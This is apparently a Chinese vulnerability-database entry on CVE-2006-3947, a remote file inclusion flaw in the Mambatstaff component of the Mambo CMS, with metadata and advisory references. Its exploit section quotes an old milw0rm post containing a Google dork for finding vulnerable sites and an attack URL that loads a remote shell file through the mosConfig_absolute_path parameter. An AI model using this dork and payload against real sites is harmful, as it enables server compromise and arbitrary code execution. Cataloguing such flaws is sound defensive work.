Mambatstaff 'mambatstaff.php' MosConfig_Absolute_Path远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110704 漏洞类型 代码注入
发布时间 2006-07-29 更新时间 2007-10-01
CVE编号 CVE-2006-3947 CNNVD-ID CNNVD-200608-018
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/2086
https://cxsecurity.com/issue/WLB-2006080022
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-018
|漏洞详情
Mambo软件的Mambatstaff3.1b及早期版本组件中的components/com_mambatstaff/mambatstaff.php脚本存在PHP远程文件包含漏洞,远程攻击者可借助mosConfig_absolute_path参数中的URL执行任意PHP代码。
|漏洞EXP
# mambatstaff Mambo Component <=  Remote Include Vulnerability

# Rish : High
# Class : Remote
# Script : mambatstaff
# Thanx : www.lezr.com/vb & All kuwait hackers

# d0rkiz : allinurl:"com_mambatstaff"

#
http://www.site.com/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://shell.txt

# by Dr.Jr7

# milw0rm.com [2006-07-29]
|参考资料

来源:XF
名称:mambatstaff-mambatstaff-file-include(28074)
链接:http://xforce.iss.net/xforce/xfdb/28074
来源:BID
名称:19222
链接:http://www.securityfocus.com/bid/19222
来源:BUGTRAQ
名称:20060729mambatstaffMamboComponent<=RemoteIncludeVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/441538/100/0/threaded
来源:OSVDB
名称:27653
链接:http://www.osvdb.org/27653
来源:MILW0RM
名称:2086
链接:http://www.milw0rm.com/exploits/2086
来源:VUPEN
名称:ADV-2006-3055
链接:http://www.frsirt.com/english/advisories/2006/3055
来源:SECUNIA
名称:21292
链接:http://secunia.com/advisories/21292
来源:MILW0RM
名称:2086
链接:http://milw0rm.com/exploits/2086
来源:SREASON
名称:1313
链接:http://securityreason.com/securityalert/1313